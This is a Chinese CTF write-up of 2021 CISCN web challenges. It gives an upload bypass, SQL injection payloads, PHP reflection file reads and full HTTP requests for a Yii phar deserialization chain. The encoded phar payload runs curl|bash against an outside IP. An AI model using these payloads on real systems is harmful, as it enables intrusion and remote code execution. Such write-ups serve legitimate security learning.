2021CISCNweb总结

ctf 2021CISCN 文件上传 uncide欺骗无列名注入 php反射类利用

Word count: 4.2kReading time: 24 min

 2021/05/16   Share

前言

单纯记录下考点

WEB

upload

考点

文件上传绕过
unicode欺骗

做题

同目录两个源码,index.php,example.php(须扫目录)

<?php
if (!isset($_GET["ctf"])) {
    highlight_file(__FILE__);
    die();
}

if(isset($_GET["ctf"]))
    $ctf = $_GET["ctf"];

if($ctf=="upload") {
    if ($_FILES['postedFile']['size'] > 1024*512) {
        die("这么大个的东西你是想d我吗？");
    }
    $imageinfo = getimagesize($_FILES['postedFile']['tmp_name']);
    if ($imageinfo === FALSE) {
        die("如果不能好好传图片的话就还是不要来打扰我了");
    }
    if ($imageinfo[0] !== 1 && $imageinfo[1] !== 1) {
        die("东西不能方方正正的话就很讨厌");
    }
    $fileName=urldecode($_FILES['postedFile']['name']);
    if(stristr($fileName,"c") || stristr($fileName,"i") || stristr($fileName,"h") || stristr($fileName,"ph")) {
        die("有些东西让你传上去的话那可不得了");
    }
    $imagePath = "image/" . mb_strtolower($fileName);
    if(move_uploaded_file($_FILES["postedFile"]["tmp_name"], $imagePath)) {
        echo "upload success, image at $imagePath";
    } else {
        die("传都没有传上去");
    }
}

example.php

<?php
if (!isset($_GET["ctf"])) {
    highlight_file(__FILE__);
    die();
}

if(isset($_GET["ctf"]))
    $ctf = $_GET["ctf"];

if($ctf=="poc") {
    $zip = new \ZipArchive();
    $name_for_zip = "example/" . $_POST["file"];
    if(explode(".",$name_for_zip)[count(explode(".",$name_for_zip))-1]!=="zip") {
        die("要不咱们再看看？");
    }
    if ($zip->open($name_for_zip) !== TRUE) {
        die ("都不能解压呢");
    }

    echo "可以解压，我想想存哪里";
    $pos_for_zip = "/tmp/example/" . md5($_SERVER["REMOTE_ADDR"]);
    $zip->extractTo($pos_for_zip);
    $zip->close();
    unlink($name_for_zip);
    $files = glob("$pos_for_zip/*");
    foreach($files as $file){
        if (is_dir($file)) {
            continue;
        }
        $first = imagecreatefrompng($file);
        $size = min(imagesx($first), imagesy($first));
        $second = imagecrop($first, ['x' => 0, 'y' => 0, 'width' => $size, 'height' => $size]);
        if ($second !== FALSE) {
            $final_name = pathinfo($file)["basename"];
            imagepng($second, 'example/'.$final_name);
            imagedestroy($second);
        }
        imagedestroy($first);
        unlink($file);
    }

}

思路：

生成图片马shell.php,压缩成zip，字符i用unicodeU+130替换
在example.php跨目录解压exp.zip

考点分析

getimagesize可用如下替代
1
2
#define width 1
#define height 1
将上述代码加到exp.zip后面即可，且可以设置高度和宽度
unicode替换

unicode相似字符搜索网站：https://teshuzi.com/zh/tu61.html
unicode欺骗：https://eng.getwisdom.io/awesome-unicode/#collisionlowercasetransformationcollisions

easysql

考点

无列名注入

解题

用updatexml()报错注入
用select (1,1,1)>(select * from users)来判断列数，然后用join using判断字段名
select ? form ?

考点分析

参考链接:
https://y4er.com/post/no-column-name-injection/

https://www.freesion.com/article/4322842637/#join__usingxx_66

分为order by、子查询、join using三种

order by
用图片来解释

比如要跑第三个字段，那么payload就是
1
select * from users where id=1 union select 1,2,'p' order by 3
此时是在以第三列进行比对然后进行排序，如’b’<’c’为True,那么当’b’>’c’时为False，回显发生变化，就可以以此来判断列名
子查询
思想是换列名，先用几个(select 1)a来判断列数

此时列名换成我们已知的了，就可以查询字段名了，如上面的admin、pass就是字段名

payload:

1	?id=3 union select 1,2,x.2 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from this_1s_th3_fiag_tab13)x

这个payload直接读取了this_1s_th3_fiag_tab13表的第二列的所有数据
20210516230745
3. join using
获取第一列的列名

1	?id=-1' union all select * from (select * from users as a join users as b)as c--+

获取次列及后续列名

1
2
3

?id=-1' union all select*from (select * from users as a join users b using(id,username))c--+

?id=-1' union all select*from (select * from users as a join users b using(id,username,password))c--+

数据库中as主要作用是起别名，常规来说都可以省略，但是为了增加可读性，不建议省略。

easysouce

考点

php反射类利用

做题

<?php
class User
{
    private static $c = 0;

    function a()
    {
        return ++self::$c;
    }

    function b()
    {
        return ++self::$c;
    }

    function c()
    {
        return ++self::$c;
    }

    function d()
    {
        return ++self::$c;
    }

    function e()
    {
        return ++self::$c;
    }

    function f()
    {
        return ++self::$c;
    }

    function g()
    {
        return ++self::$c;
    }

    function h()
    {
        return ++self::$c;
    }

    function i()
    {
        return ++self::$c;
    }

    function j()
    {
        return ++self::$c;
    }

    function k()
    {
        return ++self::$c;
    }

    function l()
    {
        return ++self::$c;
    }

    function m()
    {
        return ++self::$c;
    }

    function n()
    {
        return ++self::$c;
    }

    function o()
    {
        return ++self::$c;
    }

    function p()
    {
        return ++self::$c;
    }

    function q()
    {
        return ++self::$c;
    }

    function r()
    {
        return ++self::$c;
    }

    function s()
    {
        return ++self::$c;
    }

    function t()
    {
        return ++self::$c;
    }
    
}

$rc=$_GET["rc"];
$rb=$_GET["rb"];
$ra=$_GET["ra"];
$rd=$_GET["rd"];
$method= new $rc($ra, $rb);
var_dump($method->$rd());

payload:

1 2	?rc=ReflectionMethod&ra=User&rb=q&rd=__toString ?rc=SplFileObject&ra=index.php&rb=r&rd=fpassthru

20210517104140
20210517104249

考点分析

从这里找反射类和方法https://www.php.net/manual/zh/book.reflection.php

filter

考点

yii反序列化新链
通过php://filter将phar写入log文件

参考链接

清空日志文件

GET /?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log HTTP/1.1
Host: 192.168.16.128:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

20210519151806
添加前缀

GET /?file=AA HTTP/1.1
Host: 192.168.16.128:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

写入phar

GET /?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=35=00=41=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=44=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=51=00=32=00=39=00=6B=00=5A=00=57=00=4E=00=6C=00=63=00=48=00=52=00=70=00=62=00=32=00=35=00=63=00=52=00=58=00=68=00=30=00=5A=00=57=00=35=00=7A=00=61=00=57=00=39=00=75=00=58=00=46=00=4A=00=31=00=62=00=6C=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4D=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=44=00=4D=00=36=00=49=00=67=00=42=00=44=00=62=00=32=00=52=00=6C=00=59=00=32=00=56=00=77=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=46=00=65=00=48=00=52=00=6C=00=62=00=6E=00=4E=00=70=00=62=00=32=00=35=00=63=00=55=00=6E=00=56=00=75=00=55=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=77=00=42=00=77=00=63=00=6D=00=39=00=6A=00=5A=00=58=00=4E=00=7A=00=5A=00=58=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=41=00=36=00=49=00=6B=00=5A=00=68=00=61=00=32=00=56=00=79=00=58=00=46=00=5A=00=68=00=62=00=47=00=6C=00=6B=00=52=00=32=00=56=00=75=00=5A=00=58=00=4A=00=68=00=64=00=47=00=39=00=79=00=49=00=6A=00=6F=00=7A=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=79=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6E=00=5A=00=57=00=35=00=6C=00=63=00=6D=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=49=00=36=00=49=00=6B=00=5A=00=68=00=61=00=32=00=56=00=79=00=58=00=45=00=52=00=6C=00=5A=00=6D=00=46=00=31=00=62=00=48=00=52=00=48=00=5A=00=57=00=35=00=6C=00=63=00=6D=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=52=00=6C=00=5A=00=6D=00=46=00=31=00=62=00=48=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=44=00=45=00=36=00=49=00=6D=00=4E=00=31=00=63=00=6D=00=77=00=67=00=61=00=48=00=52=00=30=00=63=00=44=00=6F=00=76=00=4C=00=7A=00=45=00=7A=00=4F=00=53=00=34=00=79=00=4D=00=6A=00=51=00=75=00=4D=00=6A=00=51=00=33=00=4C=00=6A=00=45=00=77=00=4E=00=53=00=39=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=48=00=78=00=69=00=59=00=58=00=4E=00=6F=00=49=00=6A=00=74=00=39=00=63=00=7A=00=6F=00=78=00=4D=00=6A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=64=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=39=00=79=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6E=00=4E=00=35=00=63=00=33=00=52=00=6C=00=62=00=53=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=62=00=57=00=46=00=34=00=55=00=6D=00=56=00=30=00=63=00=6D=00=6C=00=6C=00=63=00=79=00=49=00=37=00=61=00=54=00=6F=00=35=00=4F=00=54=00=6B=00=35=00=4F=00=54=00=6B=00=35=00=4F=00=54=00=74=00=39=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=50=00=35=00=61=00=6A=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=74=00=67=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=32=00=79=00=35=00=71=00=4F=00=37=00=78=00=63=00=53=00=72=00=4F=00=2B=00=78=00=4E=00=56=00=43=00=52=00=48=00=4B=00=67=00=70=00=7A=00=57=00=4F=00=33=00=39=00=4D=00=43=00=41=00=41=00=41=00=41=00=52=00=30=00=4A=00=4E=00=51=00=67=00=3D=00=3D=00a HTTP/1.1
Host: 192.168.16.128:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

清除杂乱字符

GET /?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log HTTP/1.1
Host: 192.168.16.128:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

20210519152049
phar反序列化

GET /?file=phar:///var/www/html/basic/runtime/logs/app.log HTTP/1.1
Host: 192.168.16.128:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close